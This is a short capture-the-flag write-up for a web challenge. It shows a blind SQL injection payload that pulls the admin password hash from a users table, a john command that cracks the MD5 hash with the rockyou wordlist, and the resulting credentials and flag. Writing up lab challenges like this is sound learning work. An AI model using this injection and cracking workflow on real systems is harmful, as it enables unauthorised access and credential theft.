Using our same blind sqli script from `0x01`, we can grab the password from the database ```` "username":f"admin' AND (substr((select password from users limit 0,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#", ```` Which gives us: `40ade195ed600eb731c86e084b6a42b3` which is an **md5** hash. Using john to crack it with the `rockyou` wordlist `john hash.txt wordlist=~/wordlists/password/rockyou.txt --format=Raw-MD5` `40ade195ed600eb731c86e084b6a42b3:whereismymind` Logging in with `admin:whereismymind`  `flag{just_an_err0r_0f_thinking!}` --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #web #sqli #blind Related: